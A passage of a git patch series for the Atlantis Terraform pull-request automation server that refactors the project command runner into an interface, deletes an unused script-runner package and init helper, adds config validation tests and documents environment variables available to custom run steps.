+func (mock *MockProjectCommandRunner) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierProjectCommandRunner {
+	return &VerifierProjectCommandRunner{mock, invocationCountMatcher, inOrderContext}
+}
+
+type VerifierProjectCommandRunner struct {
+	mock                   *MockProjectCommandRunner
+	invocationCountMatcher pegomock.Matcher
+	inOrderContext         *pegomock.InOrderContext
+}
+
+func (verifier *VerifierProjectCommandRunner) Plan(ctx models.ProjectCommandContext) *ProjectCommandRunner_Plan_OngoingVerification {
+	params := []pegomock.Param{ctx}
+	methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Plan", params)
+	return &ProjectCommandRunner_Plan_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+}
+
+type ProjectCommandRunner_Plan_OngoingVerification struct {
+	mock              *MockProjectCommandRunner
+	methodInvocations []pegomock.MethodInvocation
+}
+
+func (c *ProjectCommandRunner_Plan_OngoingVerification) GetCapturedArguments() models.ProjectCommandContext {
+	ctx := c.GetAllCapturedArguments()
+	return ctx[len(ctx)-1]
+}
+
+func (c *ProjectCommandRunner_Plan_OngoingVerification) GetAllCapturedArguments() (_param0 []models.ProjectCommandContext) {
+	params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
+	if len(params) > 0 {
+		_param0 = make([]models.ProjectCommandContext, len(params[0]))
+		for u, param := range params[0] {
+			_param0[u] = param.(models.ProjectCommandContext)
+		}
+	}
+	return
+}
+
+func (verifier *VerifierProjectCommandRunner) Apply(ctx models.ProjectCommandContext) *ProjectCommandRunner_Apply_OngoingVerification {
+	params := []pegomock.Param{ctx}
+	methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Apply", params)
+	return &ProjectCommandRunner_Apply_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+}
+
+type ProjectCommandRunner_Apply_OngoingVerification struct {
+	mock              *MockProjectCommandRunner
+	methodInvocations []pegomock.MethodInvocation
+}
+
+func (c *ProjectCommandRunner_Apply_OngoingVerification) GetCapturedArguments() models.ProjectCommandContext {
+	ctx := c.GetAllCapturedArguments()
+	return ctx[len(ctx)-1]
+}
+
+func (c *ProjectCommandRunner_Apply_OngoingVerification) GetAllCapturedArguments() (_param0 []models.ProjectCommandContext) {
+	params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
+	if len(params) > 0 {
+		_param0 = make([]models.ProjectCommandContext, len(params[0]))
+		for u, param := range params[0] {
+			_param0[u] = param.(models.ProjectCommandContext)
+		}
+	}
+	return
+}
diff --git a/server/events/project_command_runner.go b/server/events/project_command_runner.go
index f8f39e0603..2c77c4fcab 100644
--- a/server/events/project_command_runner.go
+++ b/server/events/project_command_runner.go
@@ -22,6 +22,7 @@ import (
 	"github.com/runatlantis/atlantis/server/events/models"
 	"github.com/runatlantis/atlantis/server/events/runtime"
 	"github.com/runatlantis/atlantis/server/events/webhooks"
+	"github.com/runatlantis/atlantis/server/events/yaml/raw"
 	"github.com/runatlantis/atlantis/server/events/yaml/valid"
 	"github.com/runatlantis/atlantis/server/logging"
 )
@@ -42,7 +43,14 @@ type PlanSuccess struct {
 	LockURL         string
 }
 
-type ProjectCommandRunner struct {
+//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_project_command_runner.go ProjectCommandRunner
+
+type ProjectCommandRunner interface {
+	Plan(ctx models.ProjectCommandContext) ProjectCommandResult
+	Apply(ctx models.ProjectCommandContext) ProjectCommandResult
+}
+
+type DefaultProjectCommandRunner struct {
 	Locker              ProjectLocker
 	LockURLGenerator    LockURLGenerator
 	InitStepRunner      runtime.InitStepRunner
@@ -55,7 +63,7 @@ type ProjectCommandRunner struct {
 	WorkingDirLocker    WorkingDirLocker
 }
 
-func (p *ProjectCommandRunner) Plan(ctx models.ProjectCommandContext) ProjectCommandResult {
+func (p *DefaultProjectCommandRunner) Plan(ctx models.ProjectCommandContext) ProjectCommandResult {
 	// Acquire Atlantis lock for this repo/dir/workspace.
 	lockAttempt, err := p.Locker.TryLock(ctx.Log, ctx.Pull, ctx.User, ctx.Workspace, models.NewProject(ctx.BaseRepo.FullName, ctx.RepoRelDir))
 	if err != nil {
@@ -112,7 +120,7 @@ func (p *ProjectCommandRunner) Plan(ctx models.ProjectCommandContext) ProjectCom
 	}
 }
 
-func (p *ProjectCommandRunner) runSteps(steps []valid.Step, ctx models.ProjectCommandContext, absPath string) ([]string, error) {
+func (p *DefaultProjectCommandRunner) runSteps(steps []valid.Step, ctx models.ProjectCommandContext, absPath string) ([]string, error) {
 	var outputs []string
 	for _, step := range steps {
 		var out string
@@ -139,7 +147,7 @@ func (p *ProjectCommandRunner) runSteps(steps []valid.Step, ctx models.ProjectCo
 	return outputs, nil
 }
 
-func (p *ProjectCommandRunner) Apply(ctx models.ProjectCommandContext) ProjectCommandResult {
+func (p *DefaultProjectCommandRunner) Apply(ctx models.ProjectCommandContext) ProjectCommandResult {
 	repoDir, err := p.WorkingDir.GetWorkingDir(ctx.BaseRepo, ctx.Pull, ctx.Workspace)
 	if err != nil {
 		if os.IsNotExist(err) {
@@ -154,11 +162,11 @@ func (p *ProjectCommandRunner) Apply(ctx models.ProjectCommandContext) ProjectCo
 		applyRequirements = ctx.ProjectConfig.ApplyRequirements
 	}
 	if ctx.RequireApprovalOverride {
-		applyRequirements = []string{"approved"}
+		applyRequirements = []string{raw.ApprovedApplyRequirement}
 	}
 	for _, req := range applyRequirements {
 		switch req {
-		case "approved":
+		case raw.ApprovedApplyRequirement:
 			approved, err := p.PullApprovedChecker.PullIsApproved(ctx.BaseRepo, ctx.Pull) // nolint: vetshadow
 			if err != nil {
 				return ProjectCommandResult{Error: errors.Wrap(err, "checking if pull request was approved")}
@@ -200,7 +208,7 @@ func (p *ProjectCommandRunner) Apply(ctx models.ProjectCommandContext) ProjectCo
 	}
 }
 
-func (p ProjectCommandRunner) defaultPlanStage() valid.Stage {
+func (p DefaultProjectCommandRunner) defaultPlanStage() valid.Stage {
 	return valid.Stage{
 		Steps: []valid.Step{
 			{
@@ -213,7 +221,7 @@ func (p ProjectCommandRunner) defaultPlanStage() valid.Stage {
 	}
 }
 
-func (p ProjectCommandRunner) defaultApplyStage() valid.Stage {
+func (p DefaultProjectCommandRunner) defaultApplyStage() valid.Stage {
 	return valid.Stage{
 		Steps: []valid.Step{
 			{
diff --git a/server/events_controller_e2e_test.go b/server/events_controller_e2e_test.go
index a87ab1bb9c..be87412bb2 100644
--- a/server/events_controller_e2e_test.go
+++ b/server/events_controller_e2e_test.go
@@ -238,7 +238,7 @@ func setupE2E(t *testing.T) (server.EventsController, *vcsmocks.MockClientProxy,
 	defaultTFVersion := terraformClient.Version()
 	locker := events.NewDefaultAtlantisWorkingDirLocker()
 	commandRunner := &events.DefaultCommandRunner{
-		ProjectCommandRunner: &events.ProjectCommandRunner{
+		ProjectCommandRunner: &events.DefaultProjectCommandRunner{
 			Locker:           projectLocker,
 			LockURLGenerator: &mockLockURLGenerator{},
 			InitStepRunner: runtime.InitStepRunner{
diff --git a/server/server.go b/server/server.go
index f4db48d89f..f122c32fc3 100644
--- a/server/server.go
+++ b/server/server.go
@@ -239,7 +239,7 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) {
 			WorkingDirLocker: workingDirLocker,
 			RequireApproval:  userConfig.RequireApproval,
 		},
-		ProjectCommandRunner: &events.ProjectCommandRunner{
+		ProjectCommandRunner: &events.DefaultProjectCommandRunner{
 			Locker:           projectLocker,
 			LockURLGenerator: router,
 			InitStepRunner: runtime.InitStepRunner{

From 71716a64616d32f8a3fe93d5ec42d924a3a97845 Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Fri, 29 Jun 2018 19:42:28 +0200
Subject: [PATCH 58/69] Cleanup unused code.

---
 server/events/project_command_runner.go       |  14 +--
 .../matchers/ptr_to_go_version_version.go     |  20 ----
 .../matchers/ptr_to_logging_simplelogger.go   |  20 ----
 .../run/mocks/matchers/slice_of_string.go     |  19 ---
 server/events/run/mocks/mock_runner.go        | 101 ----------------
 server/events/run/run.go                      | 111 ------------------
 server/events/run/run_test.go                 |  54 ---------
 server/events/terraform/terraform_client.go   |  53 ---------
 server/events/yaml/raw/config_test.go         |  17 ++-
 9 files changed, 22 insertions(+), 387 deletions(-)
 delete mode 100644 server/events/run/mocks/matchers/ptr_to_go_version_version.go
 delete mode 100644 server/events/run/mocks/matchers/ptr_to_logging_simplelogger.go
 delete mode 100644 server/events/run/mocks/matchers/slice_of_string.go
 delete mode 100644 server/events/run/mocks/mock_runner.go
 delete mode 100644 server/events/run/run.go
 delete mode 100644 server/events/run/run_test.go

diff --git a/server/events/project_command_runner.go b/server/events/project_command_runner.go
index 2c77c4fcab..8f74af6a93 100644
--- a/server/events/project_command_runner.go
+++ b/server/events/project_command_runner.go
@@ -14,6 +14,7 @@
 package events
 
 import (
+	"fmt"
 	"os"
 	"path/filepath"
 	"strings"
@@ -108,8 +109,7 @@ func (p *DefaultProjectCommandRunner) Plan(ctx models.ProjectCommandContext) Pro
 		if unlockErr := lockAttempt.UnlockFn(); unlockErr != nil {
 			ctx.Log.Err("error unlocking state after plan error: %v", unlockErr)
 		}
-		// todo: include output from other steps.
-		return ProjectCommandResult{Error: err}
+		return ProjectCommandResult{Error: fmt.Errorf("%s\n%s", err, strings.Join(outputs, "\n"))}
 	}
 
 	return ProjectCommandResult{
@@ -136,13 +136,12 @@ func (p *DefaultProjectCommandRunner) runSteps(steps []valid.Step, ctx models.Pr
 			out, err = p.RunStepRunner.Run(ctx, step.RunCommand, absPath)
 		}
 
-		if err != nil {
-			// todo: include output from other steps.
-			return nil, err
-		}
 		if out != "" {
 			outputs = append(outputs, out)
 		}
+		if err != nil {
+			return outputs, err
+		}
 	}
 	return outputs, nil
 }
@@ -200,8 +199,7 @@ func (p *DefaultProjectCommandRunner) Apply(ctx models.ProjectCommandContext) Pr
 		Success:   err == nil,
 	})
 	if err != nil {
-		// todo: include output from other steps.
-		return ProjectCommandResult{Error: err}
+		return ProjectCommandResult{Error: fmt.Errorf("%s\n%s", err, strings.Join(outputs, "\n"))}
 	}
 	return ProjectCommandResult{
 		ApplySuccess: strings.Join(outputs, "\n"),
diff --git a/server/events/run/mocks/matchers/ptr_to_go_version_version.go b/server/events/run/mocks/matchers/ptr_to_go_version_version.go
deleted file mode 100644
index 0242745f3e..0000000000
--- a/server/events/run/mocks/matchers/ptr_to_go_version_version.go
+++ /dev/null
@@ -1,20 +0,0 @@
-package matchers
-
-import (
-	"reflect"
-
-	go_version "github.com/hashicorp/go-version"
-	"github.com/petergtz/pegomock"
-)
-
-func AnyPtrToGoVersionVersion() *go_version.Version {
-	pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(*go_version.Version))(nil)).Elem()))
-	var nullValue *go_version.Version
-	return nullValue
-}
-
-func EqPtrToGoVersionVersion(value *go_version.Version) *go_version.Version {
-	pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
-	var nullValue *go_version.Version
-	return nullValue
-}
diff --git a/server/events/run/mocks/matchers/ptr_to_logging_simplelogger.go b/server/events/run/mocks/matchers/ptr_to_logging_simplelogger.go
deleted file mode 100644
index 0889f65d58..0000000000
--- a/server/events/run/mocks/matchers/ptr_to_logging_simplelogger.go
+++ /dev/null
@@ -1,20 +0,0 @@
-package matchers
-
-import (
-	"reflect"
-
-	"github.com/petergtz/pegomock"
-	logging "github.com/runatlantis/atlantis/server/logging"
-)
-
-func AnyPtrToLoggingSimpleLogger() *logging.SimpleLogger {
-	pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(*logging.SimpleLogger))(nil)).Elem()))
-	var nullValue *logging.SimpleLogger
-	return nullValue
-}
-
-func EqPtrToLoggingSimpleLogger(value *logging.SimpleLogger) *logging.SimpleLogger {
-	pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
-	var nullValue *logging.SimpleLogger
-	return nullValue
-}
diff --git a/server/events/run/mocks/matchers/slice_of_string.go b/server/events/run/mocks/matchers/slice_of_string.go
deleted file mode 100644
index b82bbd1151..0000000000
--- a/server/events/run/mocks/matchers/slice_of_string.go
+++ /dev/null
@@ -1,19 +0,0 @@
-package matchers
-
-import (
-	"reflect"
-
-	"github.com/petergtz/pegomock"
-)
-
-func AnySliceOfString() []string {
-	pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*([]string))(nil)).Elem()))
-	var nullValue []string
-	return nullValue
-}
-
-func EqSliceOfString(value []string) []string {
-	pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
-	var nullValue []string
-	return nullValue
-}
diff --git a/server/events/run/mocks/mock_runner.go b/server/events/run/mocks/mock_runner.go
deleted file mode 100644
index a48820b113..0000000000
--- a/server/events/run/mocks/mock_runner.go
+++ /dev/null
@@ -1,101 +0,0 @@
-// Automatically generated by pegomock. DO NOT EDIT!
-// Source: github.com/runatlantis/atlantis/server/events/run (interfaces: Runner)
-
-package mocks
-
-import (
-	"reflect"
-
-	go_version "github.com/hashicorp/go-version"
-	pegomock "github.com/petergtz/pegomock"
-	logging "github.com/runatlantis/atlantis/server/logging"
-)
-
-type MockRunner struct {
-	fail func(message string, callerSkip ...int)
-}
-
-func NewMockRunner() *MockRunner {
-	return &MockRunner{fail: pegomock.GlobalFailHandler}
-}
-
-func (mock *MockRunner) Execute(log *logging.SimpleLogger, commands []string, path string, workspace string, terraformVersion *go_version.Version, stage string) (string, error) {
-	params := []pegomock.Param{log, commands, path, workspace, terraformVersion, stage}
-	result := pegomock.GetGenericMockFrom(mock).Invoke("Execute", params, []reflect.Type{reflect.TypeOf((*string)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
-	var ret0 string
-	var ret1 error
-	if len(result) != 0 {
-		if result[0] != nil {
-			ret0 = result[0].(string)
-		}
-		if result[1] != nil {
-			ret1 = result[1].(error)
-		}
-	}
-	return ret0, ret1
-}
-
-func (mock *MockRunner) VerifyWasCalledOnce() *VerifierRunner {
-	return &VerifierRunner{mock, pegomock.Times(1), nil}
-}
-
-func (mock *MockRunner) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierRunner {
-	return &VerifierRunner{mock, invocationCountMatcher, nil}
-}
-
-func (mock *MockRunner) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierRunner {
-	return &VerifierRunner{mock, invocationCountMatcher, inOrderContext}
-}
-
-type VerifierRunner struct {
-	mock                   *MockRunner
-	invocationCountMatcher pegomock.Matcher
-	inOrderContext         *pegomock.InOrderContext
-}
-
-func (verifier *VerifierRunner) Execute(log *logging.SimpleLogger, commands []string, path string, workspace string, terraformVersion *go_version.Version, stage string) *Runner_Execute_OngoingVerification {
-	params := []pegomock.Param{log, commands, path, workspace, terraformVersion, stage}
-	methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Execute", params)
-	return &Runner_Execute_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
-}
-
-type Runner_Execute_OngoingVerification struct {
-	mock              *MockRunner
-	methodInvocations []pegomock.MethodInvocation
-}
-
-func (c *Runner_Execute_OngoingVerification) GetCapturedArguments() (*logging.SimpleLogger, []string, string, string, *go_version.Version, string) {
-	log, commands, path, workspace, terraformVersion, stage := c.GetAllCapturedArguments()
-	return log[len(log)-1], commands[len(commands)-1], path[len(path)-1], workspace[len(workspace)-1], terraformVersion[len(terraformVersion)-1], stage[len(stage)-1]
-}
-
-func (c *Runner_Execute_OngoingVerification) GetAllCapturedArguments() (_param0 []*logging.SimpleLogger, _param1 [][]string, _param2 []string, _param3 []string, _param4 []*go_version.Version, _param5 []string) {
-	params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
-	if len(params) > 0 {
-		_param0 = make([]*logging.SimpleLogger, len(params[0]))
-		for u, param := range params[0] {
-			_param0[u] = param.(*logging.SimpleLogger)
-		}
-		_param1 = make([][]string, len(params[1]))
-		for u, param := range params[1] {
-			_param1[u] = param.([]string)
-		}
-		_param2 = make([]string, len(params[2]))
-		for u, param := range params[2] {
-			_param2[u] = param.(string)
-		}
-		_param3 = make([]string, len(params[3]))
-		for u, param := range params[3] {
-			_param3[u] = param.(string)
-		}
-		_param4 = make([]*go_version.Version, len(params[4]))
-		for u, param := range params[4] {
-			_param4[u] = param.(*go_version.Version)
-		}
-		_param5 = make([]string, len(params[5]))
-		for u, param := range params[5] {
-			_param5[u] = param.(string)
-		}
-	}
-	return
-}
diff --git a/server/events/run/run.go b/server/events/run/run.go
deleted file mode 100644
index 45d270e90f..0000000000
--- a/server/events/run/run.go
+++ /dev/null
@@ -1,111 +0,0 @@
-// Copyright 2017 HootSuite Media Inc.
-//
-// Licensed under the Apache License, Version 2.0 (the License);
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//    http://www.apache.org/licenses/LICENSE-2.0
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an AS IS BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-// Modified hereafter by contributors to runatlantis/atlantis.
-//
-// Package run handles running commands prior and following the
-// regular Atlantis commands.
-package run
-
-import (
-	"bufio"
-	"fmt"
-	"io/ioutil"
-	"os"
-	"os/exec"
-	"strings"
-
-	"github.com/hashicorp/go-version"
-	"github.com/pkg/errors"
-	"github.com/runatlantis/atlantis/server/logging"
-)
-
-const inlineShebang = "#!/bin/sh -e"
-
-//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_runner.go Runner
-
-type Runner interface {
-	Execute(log *logging.SimpleLogger, commands []string, path string, workspace string, terraformVersion *version.Version, stage string) (string, error)
-}
-
-type Run struct{}
-
-// Execute runs the commands by writing them as a script to disk
-// and then executing the script.
-func (p *Run) Execute(
-	log *logging.SimpleLogger,
-	commands []string,
-	path string,
-	workspace string,
-	terraformVersion *version.Version,
-	stage string) (string, error) {
-	// we create a script from the commands provided
-	if len(commands) == 0 {
-		return "", errors.Errorf("%s commands cannot be empty", stage)
-	}
-
-	s, err := createScript(commands, stage)
-	if err != nil {
-		return "", err
-	}
-	defer os.Remove(s) // nolint: errcheck
-
-	log.Info("running %s commands: %v", stage, commands)
-
-	// set environment variable for the run.
-	// this is to support scripts to use the WORKSPACE, ATLANTIS_TERRAFORM_VERSION
-	// and DIR variables in their scripts
-	os.Setenv("WORKSPACE", workspace)                                  // nolint: errcheck
-	os.Setenv("ATLANTIS_TERRAFORM_VERSION", terraformVersion.String()) // nolint: errcheck
-	os.Setenv("DIR", path)                                             // nolint: errcheck
-	return execute(s)
-}
-
-func createScript(cmds []string, stage string) (string, error) {
-	tmp, err := ioutil.TempFile("/tmp", "atlantis-temp-script")
-	if err != nil {
-		return "", errors.Wrapf(err, "preparing %s shell script", stage)
-	}
-
-	scriptName := tmp.Name()
-
-	// Write our contents to it
-	writer := bufio.NewWriter(tmp)
-	if _, err = writer.WriteString(fmt.Sprintf("%s\n", inlineShebang)); err != nil {
-		return "", errors.Wrapf(err, "writing to %q", tmp.Name())
-	}
-	cmdsJoined := strings.Join(cmds, "\n")
-	if _, err := writer.WriteString(cmdsJoined); err != nil {
-		return "", errors.Wrapf(err, "preparing %s", stage)
-	}
-
-	if err := writer.Flush(); err != nil {
-		return "", errors.Wrap(err, "flushing contents to file")
-	}
-	tmp.Close() // nolint: errcheck
-
-	if err := os.Chmod(scriptName, 0700); err != nil { // nolint: gas
-		return "", errors.Wrapf(err, "making %s script executable", stage)
-	}
-
-	return scriptName, nil
-}
-
-func execute(script string) (string, error) {
-	localCmd := exec.Command("sh", "-c", script) // #nosec
-	out, err := localCmd.CombinedOutput()
-	output := string(out)
-	if err != nil {
-		return output, errors.Wrapf(err, "running script %s: %s", script, output)
-	}
-
-	return output, nil
-}
diff --git a/server/events/run/run_test.go b/server/events/run/run_test.go
deleted file mode 100644
index 2fac2af9a4..0000000000
--- a/server/events/run/run_test.go
+++ /dev/null
@@ -1,54 +0,0 @@
-// Copyright 2017 HootSuite Media Inc.
-//
-// Licensed under the Apache License, Version 2.0 (the License);
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//    http://www.apache.org/licenses/LICENSE-2.0
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an AS IS BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-// Modified hereafter by contributors to runatlantis/atlantis.
-//
-package run
-
-import (
-	"testing"
-
-	"github.com/hashicorp/go-version"
-	"github.com/runatlantis/atlantis/server/logging"
-	. "github.com/runatlantis/atlantis/testing"
-)
-
-var logger = logging.NewNoopLogger()
-var run = &Run{}
-
-func TestRunCreateScript_valid(t *testing.T) {
-	cmds := []string{"echo", "date"}
-	scriptName, err := createScript(cmds, "post_apply")
-	Assert(t, scriptName != "", "there should be a script name")
-	Assert(t, err == nil, "there should not be an error")
-}
-
-func TestRunExecuteScript_invalid(t *testing.T) {
-	cmds := []string{"invalid", "command"}
-	scriptName, _ := createScript(cmds, "post_apply")
-	_, err := execute(scriptName)
-	Assert(t, err != nil, "there should be an error")
-}
-
-func TestRunExecuteScript_valid(t *testing.T) {
-	cmds := []string{"echo", "date"}
-	scriptName, _ := createScript(cmds, "post_apply")
-	output, err := execute(scriptName)
-	Assert(t, err == nil, "there should not be an error")
-	Assert(t, output != "", "there should be output")
-}
-
-func TestRun_valid(t *testing.T) {
-	cmds := []string{"echo", "date"}
-	v, _ := version.NewVersion("0.8.8")
-	_, err := run.Execute(logger, cmds, "/tmp/atlantis", "staging", v, "post_apply")
-	Ok(t, err)
-}
diff --git a/server/events/terraform/terraform_client.go b/server/events/terraform/terraform_client.go
index 55ed5d687e..73d21d1976 100644
--- a/server/events/terraform/terraform_client.go
+++ b/server/events/terraform/terraform_client.go
@@ -32,7 +32,6 @@ import (
 type Client interface {
 	Version() *version.Version
 	RunCommandWithVersion(log *logging.SimpleLogger, path string, args []string, v *version.Version, workspace string) (string, error)
-	Init(log *logging.SimpleLogger, path string, workspace string, extraInitArgs []string, version *version.Version) ([]string, error)
 }
 
 type DefaultClient struct {
@@ -140,58 +139,6 @@ func (c *DefaultClient) RunCommandWithVersion(log *logging.SimpleLogger, path st
 	return string(out), nil
 }
 
-// Init executes "terraform init" and "terraform workspace select" in path.
-// workspace is the workspace to select and extraInitArgs are additional arguments
-// applied to the init command. version is the terraform version being executed.
-// Init is guaranteed to be called with version >= 0.9 since the init command
-// was only introduced in that version. It properly handles the renaming of the
-// env command to workspace since 0.10.
-//
-// Returns the string outputs of running each command.
-func (c *DefaultClient) Init(log *logging.SimpleLogger, path string, workspace string, extraInitArgs []string, version *version.Version) ([]string, error) {
-	var outputs []string
-
-	output, err := c.RunCommandWithVersion(log, path, append([]string{"init", "-no-color"}, extraInitArgs...), version, workspace)
-	outputs = append(outputs, output)
-	if err != nil {
-		return outputs, err
-	}
-
-	workspaceCommand := "workspace"
-	runningZeroPointNine := zeroPointNine.Check(version)
-	if runningZeroPointNine {
-		// In 0.9.* `env` was used instead of `workspace`
-		workspaceCommand = "env"
-	}
-
-	// Use `workspace show` to find out what workspace we're in now. If we're
-	// already in the right workspace then no need to switch. This will save us
-	// about ten seconds. This command is only available in > 0.10.
-	if !runningZeroPointNine {
-		workspaceShowOutput, err := c.RunCommandWithVersion(log, path, []string{workspaceCommand, "show"}, version, workspace) // nolint:vetshadow
-		outputs = append(outputs, workspaceShowOutput)
-		if err != nil {
-			return outputs, err
-		}
-		if strings.TrimSpace(workspaceShowOutput) == workspace {
-			return outputs, nil
-		}
-	}
-
-	output, err = c.RunCommandWithVersion(log, path, []string{workspaceCommand, "select", "-no-color", workspace}, version, workspace)
-	outputs = append(outputs, output)
-	if err != nil {
-		// If terraform workspace select fails we run terraform workspace
-		// new to create a new workspace automatically.
-		output, err = c.RunCommandWithVersion(log, path, []string{workspaceCommand, "new", "-no-color", workspace}, version, workspace)
-		outputs = append(outputs, output)
-		if err != nil {
-			return outputs, err
-		}
-	}
-	return outputs, nil
-}
-
 // MustConstraint will parse one or more constraints from the given
 // constraint string. The string must be a comma-separated list of
 // constraints. It panics if there is an error.
diff --git a/server/events/yaml/raw/config_test.go b/server/events/yaml/raw/config_test.go
index 9d5e76c17d..9e415e434c 100644
--- a/server/events/yaml/raw/config_test.go
+++ b/server/events/yaml/raw/config_test.go
@@ -158,7 +158,22 @@ func TestConfig_Validate(t *testing.T) {
 		description string
 		input       raw.Config
 		expErr      string
-	}{}
+	}{
+		{
+			description: "version not nil",
+			input: raw.Config{
+				Version: nil,
+			},
+			expErr: "version: is required.",
+		},
+		{
+			description: "version not 1",
+			input: raw.Config{
+				Version: Int(1),
+			},
+			expErr: "version: must equal 2.",
+		},
+	}
 	validation.ErrorTag = "yaml"
 	for _, c := range cases {
 		t.Run(c.description, func(t *testing.T) {

From f01915876d4cfa675850732ad4e29a66d925844a Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Fri, 29 Jun 2018 20:20:55 +0200
Subject: [PATCH 59/69] Add env vars to run step

---
 .../docs/atlantis-yaml-reference.md           | 14 ++++++--
 .../events/runtime/apply_step_runner_test.go  |  2 +-
 .../events/runtime/init_step_runner_test.go   |  2 +-
 .../events/runtime/plan_step_runner_test.go   |  2 +-
 server/events/runtime/run_step_runner.go      | 15 ++++++++
 server/events/runtime/run_step_runner_test.go | 35 ++++++++++++++++---
 server/events/terraform/terraform_client.go   | 11 +++---
 server/events_controller_e2e_test.go          |  4 ++-
 server/server.go                              |  4 ++-
 .../test-repos/tfvars-yaml/atlantis.yaml      |  1 +
 .../tfvars-yaml/exp-output-autoplan.txt       |  2 ++
 11 files changed, 75 insertions(+), 17 deletions(-)

diff --git a/runatlantis.io/docs/atlantis-yaml-reference.md b/runatlantis.io/docs/atlantis-yaml-reference.md
index 029b67e290..6009f72e52 100644
--- a/runatlantis.io/docs/atlantis-yaml-reference.md
+++ b/runatlantis.io/docs/atlantis-yaml-reference.md
@@ -66,7 +66,7 @@ workflows:
 | -------------| --- |-------------| -----|---|
 | version      | int | none | yes | This key is required and must be set to `2`|
 | projects      | array[[Project](atlantis-yaml-reference.html#project)] | [] | no | Lists the projects in this repo |
-| workflows      | map string -> [Workflow](atlantis-yaml-reference.html#workflow) | {} | no | Custom workflows |
+| workflows      | map[string -> [Workflow](atlantis-yaml-reference.html#workflow)] | {} | no | Custom workflows |
 
 ### Project
 ```yaml
@@ -153,7 +153,7 @@ A map from string to `extra_args` for a built-in command with extra arguments.
 ```
 | Key        | Type | Default           | Required | Description  |
 | -------------| --- |-------------| -----|---|
-| init/plan/apply      | map `extra_args` -> array[string] | none | no | Use a built-in command and append `extra_args`. Only `init`, `plan` and `apply` are supported as keys and only `extra_args` is supported as a value||
+| init/plan/apply      | map[`extra_args` -> array[string]] | none | no | Use a built-in command and append `extra_args`. Only `init`, `plan` and `apply` are supported as keys and only `extra_args` is supported as a value||
 #### Custom Command
 Or a custom command
 ```yaml
@@ -161,7 +161,15 @@ Or a custom command
 ```
 | Key        | Type | Default           | Required | Description  |
 | -------------| --- |-------------| -----|---|
-| run      | string| "" | no | Run a custom command|
+| run      | string| none | no | Run a custom command|
+
+::: tip
+`run` steps are executed with the following environment variables:
+* `WORKSPACE` - The Terraform workspace used for this project, ex. `default`.
+  * NOTE: if the step is executed before `init` then Atlantis won't have switched to this workspace yet.
+* `ATLANTIS_TERRAFORM_VERSION` - The version of Terraform used for this project, ex. `0.11.0`.
+* `DIR` - Absolute path to the current directory.
+:::
 
 ## Next Steps
 Check out the [atlantis.yaml Use Cases](../guide/atlantis-yaml-use-cases.html) for
diff --git a/server/events/runtime/apply_step_runner_test.go b/server/events/runtime/apply_step_runner_test.go
index 8603fbc263..0f3a7a9572 100644
--- a/server/events/runtime/apply_step_runner_test.go
+++ b/server/events/runtime/apply_step_runner_test.go
@@ -9,9 +9,9 @@ import (
 	. "github.com/petergtz/pegomock"
 	"github.com/runatlantis/atlantis/server/events/mocks/matchers"
 	"github.com/runatlantis/atlantis/server/events/models"
-	matchers2 "github.com/runatlantis/atlantis/server/events/run/mocks/matchers"
 	"github.com/runatlantis/atlantis/server/events/runtime"
 	"github.com/runatlantis/atlantis/server/events/terraform/mocks"
+	matchers2 "github.com/runatlantis/atlantis/server/events/terraform/mocks/matchers"
 	"github.com/runatlantis/atlantis/server/events/yaml/valid"
 	. "github.com/runatlantis/atlantis/testing"
 )
diff --git a/server/events/runtime/init_step_runner_test.go b/server/events/runtime/init_step_runner_test.go
index 8422f41909..ff0ec9f084 100644
--- a/server/events/runtime/init_step_runner_test.go
+++ b/server/events/runtime/init_step_runner_test.go
@@ -7,9 +7,9 @@ import (
 	. "github.com/petergtz/pegomock"
 	"github.com/runatlantis/atlantis/server/events/mocks/matchers"
 	"github.com/runatlantis/atlantis/server/events/models"
-	matchers2 "github.com/runatlantis/atlantis/server/events/run/mocks/matchers"
 	"github.com/runatlantis/atlantis/server/events/runtime"
 	"github.com/runatlantis/atlantis/server/events/terraform/mocks"
+	matchers2 "github.com/runatlantis/atlantis/server/events/terraform/mocks/matchers"
 	"github.com/runatlantis/atlantis/server/logging"
 	. "github.com/runatlantis/atlantis/testing"
 )
diff --git a/server/events/runtime/plan_step_runner_test.go b/server/events/runtime/plan_step_runner_test.go
